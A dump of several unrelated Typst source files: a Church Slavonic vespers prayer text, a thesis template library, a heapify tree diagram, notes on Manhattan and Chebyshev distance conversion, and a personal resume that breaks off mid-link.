"Da búdut úši tvojí vnémľušči hlásu molénija mojehó.",
"Ašče bezzakónija nazriši Hóspodi, Hóspodi kto postojít, jáko u tebé očiščénije jesť.",
"Imené rádi tvojehó poterpích ťa Hóspodi, poterpí dušá mojá vo slóvo tvojé, upová dušá mojá na Hóspoda.",
"Ot stráži útrenija do nóšči, ot stráži útrénija da upovájet Isrájiľ na Hóspoda.",
"Jáko u Hóspoda mílosť i mnóhoje u ného izbavlénije, i toj izbávit isrájiľa ot vsich bezzakónij jehó.",
"Chvalíte Hóspoda vsi jazýcy, pochvalíte jehó vsi ľúdije.",
"Jáko utverdísja mílosť jehó na nás, i ístina Hospódňa prebyvájet vo vík."
))
#header[Svíte tíchij]
#lettrine("Svíte tíchij, * svjatýja slávy, * bezsmértnaho Otcá nebésnaho, * svjatáho blažénnaho, * Iisúse Christé: * Prišédše sólnca na západ, * víďivše svít večérnij, * pojém Otcá i Sýna i svjatáho Dúcha Bóha. * Dostójin jesí * vo vsja vremená, * pít býti * hlásy prepodóbnými, * Sýne Bóžij, * živót dajáj vsemú míru, * jehóže rádi * vés mír slávit ťa.")
#header[Prokimen]
#note[Sunday - Saturday evening, Tone 6]
#lettrine("Hóspoď vocarísja, v ľipótu oblečesja.")
#vers[Oblečesja Hóspoď v sílu i prepojásasja]
#vers[Íbo utverdí vselénnuju, jaže ne podvížitsja.]
#vers[Dómu tvojemú podobajet svjatýňa, Hóspodi, v dolhotú dníj.]
#note[Or we take the prescribed prokeimenon of the feast.]
#header[Čténia]
#note[We take the readings, if there are any:]
#ektenia(40)
#header[Spodóbi, Hóspodi]
#lettrine("Spodóbi, Hóspodi, vo véčer sej, * bez hrichá sochranitísja nám. - Blahoslovén jesí, Hóspodi, Bóže otéc nášich, * i chváľno i proslávlenno ímja tvojé vo víki, amíň. - Búdi, Hóspodi, mílosť tvojá na nas, * jákože upováchom na ťa. - Blahoslovén jesí, Hóspodi, * naučí nas opravdánijem tvojím. - Blahoslovén jesí, Vladýko, * vrazúmi nas opravdánijem tvojím. - Blahoslovén jesí, Svjatýj, * prosvití nás opravdániji tvojími. - Hóspodi, mílosť tvojá vo vik, * ďíl rukú tvojéju ne prezri. - Tebí podobájet chvalá, * tebí podobájet pínije. - Tebí sláva podobájet * Otcú i Sýnu i svjatómu Dúchu. - Nýňi i prísno, * i vo víki vikóv, amíň.")
#ektenia(12)
#header[Stichiry na litii]
#note[If the litia is prescribed, we pray the litia stichera]
#ektenia(120)
#header[Stichíry na stichovňi]
#slohy((
"Hospóď vocarísja, v ľípotu oblečésja.",
"Íbo utverdí vselénnuju jáže ne podvížitsja.",
"Dómu tvojemú podobájet svjatýňa Hóspodi, v dolhotú dnij."
))
#header[Molitva Simeona]
#lettrine("Nýňi otpuščáješi rabá tvojehó, Vladýko, * po hlahólu tvojemú s mírom. * Jáko víďista oči mojí spasénije tvojé, * jéže jesí uhotovál pred licém vsich ľudéj. * Svít vo otkrovénije jazýkov * i slávu ľudéj tvojích Ísraiľa")
#trojsvatePoOtcenas
#header[Tropar]
#note[We take the troparia, concluded with the theotokion:]
#include "../zalmy/Z33_vecieren.typ"
#prepustenieBezKnaza |
|
https://github.com/kotatsuyaki/canonical-nthu-thesis | https://raw.githubusercontent.com/kotatsuyaki/canonical-nthu-thesis/main/lib.typ | typst | MIT License | #import "pages/zh-cover.typ": zh-cover-page
#import "pages/en-cover.typ": en-cover-page
#import "pages/outlines.typ": outline-pages
#import "layouts/preface.typ": preface-impl
#import "layouts/body.typ": body-impl
#import "layouts/doc.typ": doc-impl
#let cover-pages-impl(info: (:), style: (:)) = {
zh-cover-page(info: info, style: style)
en-cover-page(info: info)
}
#let setup-thesis(
info: (:),
style: (:),
) = {
// The default values for info.
info = (
degree: "master",
title-zh: [一個標題有點長的 \ 有趣的研究],
title-en: [An Interesting Research \ With a Somewhat Long Title],
department-zh: "某學系",
department-en: "Mysterious Department",
id: "012345678",
author-zh: "張三",
author-en: "<NAME>",
supervisor-zh: "李四 教授",
supervisor-en: "Prof. <NAME>",
// TODO: Revisit this when Typst support displaying datetime in non-English languages.
year-zh: "一一三",
month-zh: "七",
date-en: "July 2024",
keywords-zh: ("關鍵詞", "列表", "範例"),
keywords-en: ("example", "keywords", "list"),
) + info
// The default values for style.
style = (
// Margin sizes for all non-cover pages.
margin: (top: 1.75in, left: 2in, right: 1in, bottom: 2in),
// The fonts used throughout the thesis.
fonts: ("New Computer Modern", "TW-MOE-Std-Kai"),
// The math equation fonts used throughout the thesis.
math-fonts: ("New Computer Modern"),
// Whether to show a list of tables in the `outline-pages()` function.
outline-tables: true,
// Whether to show a list of figures in the `outline-pages()` function.
outline-figures: true,
// Whether to show the text "Draft version" and the date on the margin.
show-draft-mark: false,
// The row heights of the Chinese cover page.
cover-row-heights: (30pt, 30pt, 30pt),
) + style
return (
doc: doc-impl.with(info: info, style: style, show-draft-mark: style.show-draft-mark),
cover-pages: cover-pages-impl.with(info: info, style: style),
preface: preface-impl.with(margin: style.margin),
outline-pages: outline-pages.with(
outline-tables: style.outline-tables,
outline-figures: style.outline-figures,
),
body: body-impl.with(margin: style.margin),
)
}
|
https://github.com/noahjutz/AD | https://raw.githubusercontent.com/noahjutz/AD/main/notizen/sortieralgorithmen/heapsort/heapify_step_0.typ | typst | #import "/components/lefttree.typ": lefttree, draw_node, note, connect, bent_line, fade
#import "@preview/cetz:0.3.0"
#cetz.canvas({
import cetz.draw: *
import cetz.tree: tree
tree(
lefttree((34, 45, 38).map(n => str(n))),
draw-node: draw_node.with(hl_primary: 0),
spread: 2,
name: "tree"
)
note(0, ang: 0deg)[root]
note(1, ang: 180deg)[largest]
connect(
0, 1,
bent_line.with(bend: -.5, mark: (symbol: ">"))
)
fade(1, ang: -45deg)
fade(2, ang: -45deg)
fade(1, ang: 225deg)
fade(2, ang: 225deg)
}) |
|
https://github.com/chamik/gympl-skripta | https://raw.githubusercontent.com/chamik/gympl-skripta/main/cj-autori/sverak-smoljak.typ | typst | Creative Commons Attribution Share Alike 4.0 International | #import "/helper.typ": autor
#autor("<NAME>", "1936", "", "režisér a scénárista", "učitelství češtiny", "novodobý", "/cj-autori/media/sverak.jpg")
#autor("<NAME>", "1931", "2010 (78 let)", "režisér a scénárista", "učitelství matematiky a fyziky", "novodobý", "/cj-autori/media/smoljak.jpg")
Oba pracovali ve filmových studiích Barrandov. Režírovali spolu filmy "Jáchyme, hoď ho do stroje", "Marečku, podejte mi pero", "Na samotě u lesa" a Cimrmana.
Svěrák má 2 české lvy, medaili Za zásluhy ČR a spolu se svým synem Oscara za film Kolja. Je spoluzakladatelem divadla <NAME>. Napsal knížku o Smoljakovi jménem "<NAME>, hrající bdící". Soudil se hodně dlouho s Bauhausem (udělali reklamu s textem "upeč třeba zeď") a nakonec vyhrál. Založil #underline[Centrum Paraple] pro lidi s poraněním míchy.
Smoljak byl redaktorem Mladé fronty. Podílel se na vytvoření ankety Zlatý slavík. Byl politicky angažovaný. Režisér divadelního spolku.
První hra v divadle J. C. byla "Akt" v roce 1967. V tomto divadle se hrají pouze autorská díla.
Svěrák písničky: Mravenčí ukolébavka, Není nutno (Tři veteráni), Dělání a Statistika (Princové jsou na draka), Když se zamiluje kůň, "taková ta narozeninová" ("X má narozeniny, my máme přání jediný"), Hajný je lesa pán... většina složená s Uhlířem.
Smoljak hry: Hymna aneb Urfidlovačka, Malý říjen
*Současníci*\
_<NAME>_ -- písničky pro děti\
_<NAME>_ (syn) -- spolupráce na filmech (Kolja, Vratné lahve, Kuki se vrací)\
_<NAME>_ -- spoluzakladatel divadla <NAME>mana
#pagebreak() |
https://github.com/alberto-lazari/computer-science | https://raw.githubusercontent.com/alberto-lazari/computer-science/main/advanced-topics-cs/quantum-algorithms/chapters/deepening.typ | typst | #import "/common.typ": *
= Shor's factorization algorithm
An interesting quantum algorithm that brings great performance improvements and has real-world implications is Shor's integer factorization algorithm.
== Classical integer factorization
Factorizing an integer $n$ is generally intractable on classical computational models, since the fastest known algorithm has a sub-exponential complexity of $O(e^((log n)^(1/3) (log log n)^(2/3)))$.
Many cryptography-related algorithms and protocols exploit this fact to ensure encryption that is, for all practical purposes, computationally unbreakable.
== Quantum factorization
Shor's algorithm provides an exponential speedup over classical approaches: it uses a number of quantum gates of order $O((log n)^2 (log log n) (log log log n))$.
The high-level steps of Shor's algorithm are:
+ The problem of finding $n$'s integer factors is reduced to finding the period of a function
$f(x) = a^x "mod" n$.
The objective is to find the smallest positive integer $r$ such that $a^r equiv 1 "mod" n$; this $r$ is the period of $f$
+ Quantum phase estimation: applies modular exponentiation and the inverse QFT to a uniform superposition of all possible states (initialized with Hadamard gates)
+ Classical post-processing: uses the period $r$ to find the factors of $n$
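The classical parts of this pipeline can be sketched in a few lines of Python (a minimal illustration; here `find_period` brute-forces the order of $a$ modulo $n$, standing in for the quantum phase-estimation step, and the helper names are ours):

```python
from math import gcd

def find_period(a, n):
    # Brute-force the order r of a modulo n; in Shor's algorithm this
    # is the step performed by quantum phase estimation.
    r, x = 1, a % n
    while x != 1:
        x = (x * a) % n
        r += 1
    return r

def shor_postprocess(n, a):
    # Classical post-processing: turn the period r into factors of n.
    if gcd(a, n) != 1:
        return gcd(a, n), n // gcd(a, n)  # lucky guess: a shares a factor with n
    r = find_period(a, n)
    if r % 2 == 1:
        return None  # odd period: retry with another a
    y = pow(a, r // 2, n)
    if y == n - 1:
        return None  # a^(r/2) == -1 (mod n): retry with another a
    p, q = gcd(y - 1, n), gcd(y + 1, n)
    if p > 1 and q > 1 and p * q == n:
        return p, q
    return None

print(shor_postprocess(15, 7))  # → (3, 5)
```

For $n = 15$ and $a = 7$ the period is $r = 4$, so the factors fall out of the two gcd computations.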
== Implications
Implementing this quantum algorithm would lead to severe consequences in a big section of current cryptography and cyber security in general.
It could be used to break various cryptography mechanisms, like private/public-key schemes, most notably:
- The RSA algorithm
- Diffie-Hellman key exchange
However, current quantum computers seem to have too few qubits, and to be too unstable due to noise and errors, for Shor's algorithm to pose a serious threat in real-world scenarios.
|
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/compiler/return-00.typ | typst | Other | // Test return with value.
#let f(x) = {
return x + 1
}
#test(f(1), 2)
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/visualize/stroke_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Some simple test lines
#line(length: 60pt, stroke: red)
#v(3pt)
#line(length: 60pt, stroke: 2pt)
#v(3pt)
#line(length: 60pt, stroke: blue + 1.5pt)
#v(3pt)
#line(length: 60pt, stroke: (paint: red, thickness: 1pt, dash: "dashed"))
#v(3pt)
#line(length: 60pt, stroke: (paint: red, thickness: 4pt, cap: "round"))
|
https://github.com/GYPpro/ACM_res | https://raw.githubusercontent.com/GYPpro/ACM_res/main/0_Template/geo/Distance.typ | typst | #import "@preview/codelst:2.0.1": sourcecode
// Display inline code in a box
#set text(font:("Times New Roman","Source Han Serif SC"))
#show raw.where(block: false): box.with(
fill: luma(230),
inset: (x: 3pt, y: 0pt),
outset: (y: 3pt),
radius: 2pt,
)
#show raw.where(block: true): block.with(
fill: luma(240),
inset: 10pt,
radius: 4pt,
)
#show raw: set text(
font: ("consolas", "Source Han Serif SC")
)
#set page(
// flipped: true,
// background: [#image("background.png")]
paper: "a4",
)
#set text(
font:("Times New Roman","Source Han Serif SC"),
style:"normal",
weight: "regular",
size: 13pt,
)
#show math.equation:set text(font:("New Computer Modern Math","Source Han Serif SC"))
#let nxtIdx(name) = box[ #counter(name).step()#counter(name).display()]
#set math.equation(numbering: "(1)")
#set page(
paper:"a4",
number-align: right,
margin: (x:2cm,y:2.5cm),
header: [
#box(baseline:5pt)[#set text(
size: 11pt,
)
#align(
left+bottom,
[
#smallcaps[ ]
#h(1fr)#text(" ",fill:rgb("#898989"));
]
)]
#line(start: (0pt,-10pt),end:(483pt,-10pt))
],
numbering: "1/1"
)
#set math.mat(delim: "[")
#set math.vec(delim: "[")
#set page(
paper:"a4",
number-align: right,
margin: (x:2cm,y:2.5cm),
header: [
#box(baseline:5pt)[#set text(
size: 11pt,
)
#align(
left+bottom,
[
#smallcaps[Templates]
#h(1fr)#text("Github GYPpro/Acm_res",fill:rgb("#898989"));
]
)]
#line(start: (0pt,-10pt),end:(483pt,-10pt))
],
numbering: "1/1"
)
///MAIN---MAIN///
=== 曼哈顿距离
$ d(A,B) = |x_1 - x_2| + |y_1 - y_2| $
=== 欧几里得距离
$ d(A,B) = sqrt((x_1 - x_2)^2 + (y_1 - y_2)^2) $
=== 切比雪夫距离
$ d(A,B) = max(|x_1 - x_2|, |y_1 - y_2|) $
=== 闵可夫斯基距离
$ d(A,B) = (|x_1 - x_2|^p + |y_1 - y_2|^p)^(1/p) $
=== 曼哈顿转切比雪夫
对于直角坐标中的$A(x_1,y_1),B(x_2,y_2)$
其曼哈顿距离
$ d(A,B) = max(|(x_1+y_1) - (x_2+y_2)|, |(x_1-y_1)-(x_2-y_2)|) $
即为点$A'(x_1+y_1,x_1-y_1),B'(x_2+y_2,x_2-y_2)$的切比雪夫距离。
同理,其切比雪夫距离
$ d(A,B) = |(x_1+y_1)/2-(x_2+y_2)/2| + |(x_1-y_1)/2-(x_2-y_2)/2| $
即为点$A'((x_1+y_1)/2,(x_1-y_1)/2),B'((x_2+y_2)/2, (x_2-y_2)/2)$的曼哈顿距离。
综上:
$
"曼哈顿距离" & =>"切比雪夫距离:" \
(x,y) & => (x+y,x-y) \
"切比雪夫距离"&=>"曼哈顿距离:"\
(x,y) &=> ((x+y)/2,(x-y)/2) $ |
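上面的坐标变换很容易做数值验证,下面用一小段 Python 示意(函数名仅为演示用的假设命名):曼哈顿距离等于变换后点对的切比雪夫距离,反之亦然。

```python
def manhattan(a, b):
    return abs(a[0] - b[0]) + abs(a[1] - b[1])

def chebyshev(a, b):
    return max(abs(a[0] - b[0]), abs(a[1] - b[1]))

def to_chebyshev(p):
    # 曼哈顿 -> 切比雪夫:(x, y) -> (x+y, x-y)
    return (p[0] + p[1], p[0] - p[1])

def to_manhattan(p):
    # 切比雪夫 -> 曼哈顿:(x, y) -> ((x+y)/2, (x-y)/2)
    return ((p[0] + p[1]) / 2, (p[0] - p[1]) / 2)

A, B = (3, -1), (-2, 4)
assert manhattan(A, B) == chebyshev(to_chebyshev(A), to_chebyshev(B))  # 都是 10
assert chebyshev(A, B) == manhattan(to_manhattan(A), to_manhattan(B))  # 都是 5
```

在棋盘类问题中,常用该变换把切比雪夫距离的统计化成两个坐标轴上相互独立的一维问题。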
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/layout/grid-1-01.typ | typst | Other | #set rect(inset: 0pt)
#grid(
columns: (auto, auto, 40%),
column-gutter: 1fr,
row-gutter: 1fr,
rect(fill: eastern)[dddaa aaa aaa],
rect(fill: green)[ccc],
rect(fill: rgb("dddddd"))[aaa],
)
|
https://github.com/LDemetrios/ProgLectures | https://raw.githubusercontent.com/LDemetrios/ProgLectures/main/kotlinheader.typ | typst | #import "@local/ldemetrios-commons:0.1.0" : * // https://github.com/LDemetrios/LDemetrios-Typst-Commons
//////////// Icons
#let JVM = [#box[#pad(bottom:-0.2em)[#image(height: 1.2em, "JVM icon.png")]] *JV**M*]
#let Kotlin = [ #box[#pad(bottom:-0.05em,right: -0.3em)[#image(height: 0.8em, "Kotlin.png")]] otlin]
#let IEEE = [ #box[#pad(bottom:-0.3em,right: -0.3em)[#image(height: 1.2em, "IEEE.png")]] `I``E``E``E`]
//////////// Styling
#let dev-mode = "dev-mode"
#let rel-mode = "rel-mode"
#let print-mode = "print-mode"
#let mode = rel-mode
#let code-color = if (mode == print-mode) { black } else if (mode == dev-mode) { white } else { rgb("#002583") }
#let foreground = if (mode == print-mode) { black } else if (mode == dev-mode) { white } else { black }
#let background = if (mode == print-mode) { white } else if (mode == dev-mode) { black } else { white }
#let comment-back = if (mode == print-mode) { white } else if (mode == dev-mode) { black } else { luma(230) }
//////////// Standard types
#let kttype(s) = raw(s, lang: "kt")
#let KtBool = kttype("Boolean")
#let KtByte = kttype("Byte")
#let KtShort = kttype("Short")
#let KtInt = kttype("Int")
#let KtLong = kttype("Long")
#let KtChar = kttype("Char")
#let KtFloat = kttype("Float")
#let KtDouble = kttype("Double")
#let KtString = kttype("String")
#let KtUnit = kttype("Unit")
#let KtNothing = kttype("Nothing")
#let KtBool7 = kttype("Boolean?")
#let KtByte7 = kttype("Byte?")
#let KtShort7 = kttype("Short?")
#let KtInt7 = kttype("Int?")
#let KtLong7 = kttype("Long?")
#let KtChar7 = kttype("Char?")
#let KtFloat7 = kttype("Float?")
#let KtDouble7 = kttype("Double?")
#let KtString7 = kttype("String?")
#let KtUnit7 = kttype("Unit?")
#let KtNothing7 = kttype("Nothing?")
#let KtStar = kttype("*")
#let Any = kttype("Any")
#let Array(of) = kttype("Array<" + of.text + ">")
#let List(of) = kttype("List<" + of.text + ">")
#let MutableList(of) = kttype("MutableList<" + of.text + ">")
#let Pair(f, s) = kttype("Pair<" + f.text + ", " + s.text + ">")
#let Comparable(of) = kttype("Comparable<" + of.text + ">")
//////////// Paragraph styling
#let join-raw(code) = {
let i = 0
while i < code.len() {
i += 1
raw(code.at(i - 1))
}
}
#let raw-rule(code) = join-raw(code.text)
#let datatype(text) = join-raw(text)
#let static-function(text) = join-raw(text)
#let ext-function(text) = join-raw(text)
#let kt-keyword(txt) = text(fill: rgb("#0033b3"), join-raw(txt))
#let kt-literal(lit, typ) = if (typ == KtInt) {
text(fill: rgb("#1750eb"), join-raw(lit))
} else if (typ == KtLong) {
text(fill: rgb("#1750eb"), join-raw(lit))
} else if (typ == KtChar) {
text(fill: rgb("#017C01"), join-raw(lit))
} else if (typ == KtString) {
text(fill: rgb("#017C01"), join-raw(lit))
} else if (typ == KtDouble) {
text(fill: rgb("#1750eb"), join-raw(lit))
} else if (typ == KtBool) {
text(fill: rgb("#0033b3"), join-raw(lit))
} else if (typ == KtUnit) {
text(fill: rgb("#000000"), join-raw(lit))
} else [
#text(fill: foreground, join-raw(lit))
]
//////////// Custom styles
#let indent(body) = par(first-line-indent: 10pt, hanging-indent: 10pt, body)
#let comment(body) = rect(
width: 100%,
fill: comment-back,
stroke: (paint: black, thickness: 1pt),
radius: 10pt,
inset: 7%,
outset: -3%,
[\ #body\ \ ],
)
#let strikeleft(body) = tablex(
columns: 3,
align: left + horizon,
auto-hlines: false,
auto-vlines: false,
[],
vlinex(start: 0, end: 1, stroke: black + 2pt),
[],
body,
)
#let nobreak(body) = block(breakable: false, body)
//////////// Code sample blocks
#let kt(code) = [
#show regex(
"\b(var|null|if|else|fun|val|do|while|object|class|interface|return|break|continue|throw|lateinit|as|is|in|for|true|false|data|companion|infix|operator|override|public|private|protected|inline|internal|constructor|import|abstract|open)\b",
) : (it) => text(weight: "bold"/*, fill:rgb(0, 127, 255)*/, it)
#show regex("\"([^\"]*|\\[\"\\ntrf$])\"") : (it) => text(fill: rgb("#017C01"), it)
#show regex("'([ -~]|\\[\\\"nrtf]|\\\\u[0-9a-fA-F]{4})'") : (it) => text(fill: rgb("#017C01"), it)
#show regex("\b-?[0-9]+(\.[0-9]+([eE][+-]?[0-9]+)?)?\b") : (it) => text(fill: rgb("#1750eb"), it)
#show regex("//[^\n]*") : (it) => text(fill: rgb("#7F7F7F"), it)
#show regex("(?ms)/\*([^\*]|\*[^/]|\n|\r)*\*/") : (it) => text(fill: rgb("#7F7F7F"), it)
#text(fill: code-color, raw(code.text))
]
#let kt-eval(code) = [
#indent(kt(code))
]
#let kt-eval-noret(code) = [
#indent(kt(code))
]
#let kt-eval-append(code) = [
#indent(kt(code))
]
#let kt-eval-append-noret(code) = [
#indent(kt(code))
]
#let kt-res(code, typ) = [
#indent[`=> : `*#raw(typ.text)*` = `#kt-literal(code.text, typ)]
]
#let kt-print(code) = [
#indent(text(fill: rgb("#017C01"), raw(code.text)))
]
#let kt-comp-err(err) = [
#indent(text(fill: rgb("#FA3232"), raw(err.text)))
]
#let kt-runt-err(err) = [
#indent(text(fill: rgb("#FA3232"), raw(err.text)))
]
#let kt-par(body) = [
#show regex("\bNothing\?") : datatype("Nothing?")
#show regex("\bNothing\b") : datatype("Nothing")
#show regex("\bInt\?") : datatype("Int?")
#show regex("\bInt\b") : datatype("Int")
#show regex("\bLong\?") : datatype("Long?")
#show regex("\bLong\b") : datatype("Long")
#show regex("\bShort\?") : datatype("Short?")
#show regex("\bShort\b") : datatype("Short")
#show regex("\bByte\?") : datatype("Byte?")
#show regex("\bByte\b") : datatype("Byte")
#show regex("\bChar\?") : datatype("Char?")
#show regex("\bChar\b") : datatype("Char")
#show regex("\bFloat\?") : datatype("Float?")
#show regex("\bFloat\b") : datatype("Float")
#show regex("\bDouble\?") : datatype("Double?")
#show regex("\bDouble\b") : datatype("Double")
#show regex("\bAny\?") : datatype("Any?")
#show regex("\bAny\b") : datatype("Any")
#show regex("\bString\?") : datatype("String?")
#show regex("\bString\b") : datatype("String")
#show regex("\bUnit\?") : datatype("Unit?")
#show regex("\bUnit\b") : datatype("Unit")
#show regex("\bNumber\?") : datatype("Number?")
#show regex("\bNumber\b") : datatype("Number")
#show regex("\bBoolean\?\b") : datatype("Boolean?")
#show regex("\bBoolean\b") : datatype("Boolean")
//
#show regex("\bprint\b") : static-function("print")
#show regex("\bprintln\b") : static-function("println")
//
#show regex("\bval\b") : kt-keyword("val")
#show regex("\bvar\b") : kt-keyword("var")
#show regex("\bdo\b") : kt-keyword("do")
#show regex("\bwhile\b") : kt-keyword("while")
#show regex("\bif\b") : kt-keyword("if")
#show regex("\belse\b") : kt-keyword("else")
#show regex("\bfun\b") : kt-keyword("fun")
#show regex("\bobject\b") : kt-keyword("object")
#show regex("\bclass\b") : kt-keyword("class")
#show regex("\binterface\b") : kt-keyword("interface")
#show regex("\breturn\b") : kt-keyword("return")
#show regex("\bbreak\b") : kt-keyword("break")
#show regex("\bcontinue\b") : kt-keyword("continue")
#show regex("\bthrow\b") : kt-keyword("throw")
#show regex("\bnull\b") : kt-keyword("null")
#show regex("\blateinit\b") : kt-keyword("lateinit")
#show regex("\bdata\b") : kt-keyword("data")
#show regex("\bcompanion\b") : kt-keyword("companion")
#show regex("\bthis\b") : kt-keyword("this")
#show regex("\binfix\b") : kt-keyword("infix")
#show regex("\boperator\b") : kt-keyword("operator")
#show regex("\boverride\b") : kt-keyword("override")
#show regex("\bpublic\b") : kt-keyword("public")
#show regex("\bprivate\b") : kt-keyword("private")
#show regex("\bprotected\b") : kt-keyword("protected")
#show regex("\binline\b") : kt-keyword("inline")
#show regex("\binternal\b") : kt-keyword("internal")
#show regex("\bconstructor\b") : kt-keyword("constructor")
#show regex("\bas\b") : kt-keyword("as")
#show regex("\bis\b") : kt-keyword("is")
#show regex("\bimport\b") : kt-keyword("import")
#show regex("\babstract\b") : kt-keyword("abstract")
#show regex("\bopen\b") : kt-keyword("open")
//constructor
// #show regex("[0-9]{2,}") : (num) => kt-literal(num.text)
//
#show regex("\bstdout\b") : join-raw("stdout")
#show regex("\bstderr\b") : join-raw("stderr")
#show regex("\bstdin\b") : join-raw("stdin")
//#show "Kotlin" : Kotlin
//#show "JVM" : JVM
//#show "IEEE" : IEEE
#body
]
#let kt-paper-rule(body) = [
#set par(justify: true)
//#show : dark-theme
#show link: (it) => underline(text(fill: rgb("#0B0080"), it))
// TODO : show rule for JVM, JS, Kotlin, Java, C++ icon
#body
]
|
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/minimalistic-latex-cv/0.1.0/lib.typ | typst | Apache License 2.0 | #let cv(
name: "",
metadata: (),
photo: none,
lang: "en",
body,
) = {
set document(author: name, title: name + " CV")
set page(
margin: (x: 30pt, y: 30pt),
)
set text(0.9em, font: "New Computer Modern", lang: lang)
show heading.where(level: 1): it => {
set text(0.9em, weight: "light")
smallcaps(it)
v(-13pt)
line(length: 100%, stroke: 0.5pt)
v(3pt)
}
show list.item: it => {
block(inset: (left: 10pt))[#it]
}
set par(justify: true)
if photo != none {
text(1.7em, weight: "bold", name)
v(-10pt)
set image(width: 20%)
photo
place(
top + right,
{
for data in metadata {
align(end, text(upper(data.at(0).slice(0, 1)) + data.at(0).slice(1) + ": " + data.at(1)))
v(-6pt)
}
},
)
} else {
align(center, text(2.2em, weight: "bold", name))
if metadata.len() != 0 {
v(-15pt)
align(center, text(0.9em, metadata.values().join(" | ")))
}
}
body
}
#let entry(
title: str,
name: str,
date: str,
location: str,
) = {
grid(
columns: (50%, 50%),
rows: (auto, auto, auto, auto),
row-gutter: 6pt,
text(weight: "bold", title),
align(end, date),
text(style: "italic", name),
align(end, text(style: "italic", location))
)
v(-15pt)
}
|
https://github.com/mrtz-j/typst-thesis-template | https://raw.githubusercontent.com/mrtz-j/typst-thesis-template/main/modules/epigraph.typ | typst | MIT License | #let epigraph-page(body) = {
// --- Epigraphs ---
page(
numbering: none,
align(right + bottom)[
#body
],
)
}
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/math/attach-p3_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test limit.
$ lim_(n->oo \ n "grows") sum_(k=0 \ k in NN)^n k $
|
https://github.com/pluttan/typst-bmstu | https://raw.githubusercontent.com/pluttan/typst-bmstu/main/README.md | markdown | MIT License | # [BMSTU typst](https://github.com/pluttan/typst-bmstu)
В данном репозитории представлены основные шаблоны работ для студентов, оформленные в типографической системе [Typst](https://typst.app):
## Установка
Склонируйте репозиторий в `$HOME`
```bash
git clone https://github.com/pluttan/typst-bmstu $HOME/typst-bmstu
```
И запустите инсталлятор:
```bash
~/typst-bmstu/install.sh
```
## Пример студенческой работы
`TODO`
## TODO
- [ ] Пример работы
- [ ] Config-файл
- [ ] Титульник для отчетов
- [ ] Титульник для РПЗ
|
https://github.com/MH0386/MH0386 | https://raw.githubusercontent.com/MH0386/MH0386/main/resume.typ | typst | #set text(size: 10pt)
#align(center)[
#smallcaps[#text(weight: "black", size: 20pt)[<NAME>]] \
Undergraduate Student \
#link("mailto:<EMAIL>")[<EMAIL>] |
#link("tel:+201126748566")[+201126748566] |
Ezz El-Deen Omar Street, Giza, Egypt \
#strong[
#link("https://mh0386.github.io")[My Website] |
#link("https://github.com/MH0386")[GitHub] |
#link("https://linkedin.com/in/MH0386")[Linkedin]
]
]
#let chiline() = {v(-3pt); line(length: 100%); v(-5pt)}
= #smallcaps[Education]
#chiline()
#strong[Cairo University] #h(1fr) Giza, Egypt \
Artificial Intelligence Department, Bachelor of Computer Science #h(1fr) October 2020 - July 2024
= #smallcaps[Experience]
#chiline()
#strong[Science Land | Artificial Intelligence Intern] #h(1fr) Cairo, Egypt | 1 August 2023 - 31 August 2023 \
#strong[Coding Raja Technologies | Machine Learning Intern] #h(1fr) Telangana, India | 1 July 2023 - 31 July 2023 \
#strong[GDSC Cairo University | Machine Learning Intern] #h(1fr) Giza, Egypt | 1 February 2023 - 30 April 2023
= #smallcaps[Skills]
#chiline()
#strong[Programming Languages:] Python, Java, C++, Dart, SQL \
#strong[Libraries / Frameworks:] TensorFlow, PyTorch, NumPy, Pandas \
#strong[Tools / Platforms:] Machine Learning, Jupyter Notebook \
= #smallcaps[Projects]
#chiline()
#strong[Car Price Prediction] #h(1fr) #link("https://github.com/MH0386/car_price_prediction")[GitHub] \
#strong[Motorcycle Data Analysis] #h(1fr) #link("https://github.com/MH0386/motorcycle_data_analysis")[GitHub] \
#strong[Logistic Regression] #h(1fr) #link("https://github.com/MH0386/logistic_regression")[GitHub] \
= #smallcaps[Certifications]
#chiline()
- Git and GitHub - #strong[#link(
"https://almdrasa.com/certificate-verification/14AC69499-1454BFCF0-12722213C",
)[Almdrasa]] \
- Machine Learning Specialization - #strong[#link("https://coursera.org/verify/specialization/3BRYQRFUD5C6")[Coursera]] \
- Unsupervised Learning, Recommenders, Reinforcement Learning - #strong[#link("https://coursera.org/verify/B4NKPXD9UN9Z")[Coursera]] \
- Advanced Learning Algorithms - #strong[#link("https://coursera.org/verify/HM55XWLDYPA3")[Coursera]] \
- Supervised Machine Learning: Regression and Classification - #strong[#link("https://coursera.org/verify/XX8THJA26UTS")[Coursera]] \
- Python - #strong[#link("https://www.kaggle.com/learn/certification/mh0386/python")[Kaggle]] \
- Dart Functions Framework - #strong[#link("https://coursera.org/verify/X3R4PWA6F6DU")[Coursera]] \
- Dart: Introducing Class Abstraction - #strong[#link("https://coursera.org/verify/CBTJ62YWD3K7")[Coursera]] \
- Dart: Using Functions with Lists and Maps - #strong[#link("https://coursera.org/verify/XNCT9EVVDSN6")[Coursera]] \
- Dart: Variables, Data Structures, Objects, and Conditionals - #strong[#link("https://coursera.org/verify/ZPR9YGTJKDSM")[Coursera]] \
- Introduction to Dart - #strong[#link("https://coursera.org/verify/ZBJPMK8L47M2")[Coursera]] \
- Introduction to Java - #strong[#link("https://coursera.org/verify/UTPHVJYUDJV5")[Coursera]] \
- Java Basics: Selection and Iteration - #strong[#link("https://coursera.org/verify/JTM9KQJRRVPX")[Coursera]] \
- SQL - #strong[#link("https://www.sololearn.com/certificates/CT-D0OEQKTQ")[Sololearn]] \
- C++ Basics: Selection and Iteration - #strong[#link("https://coursera.org/verify/XBZVNYQD2ULL")[Coursera]] \
- Basic English 1: Elementary - #strong[#link("https://www.futurelearn.com/certificates/6b0dwsc")[FutureLearn]] \
- Python Programming Basics - #strong[#link(
"https://maharatech.gov.eg/badges/badge.php?hash=cdd36d5d43a2643e0b4b1ef117580488dc81fee7",
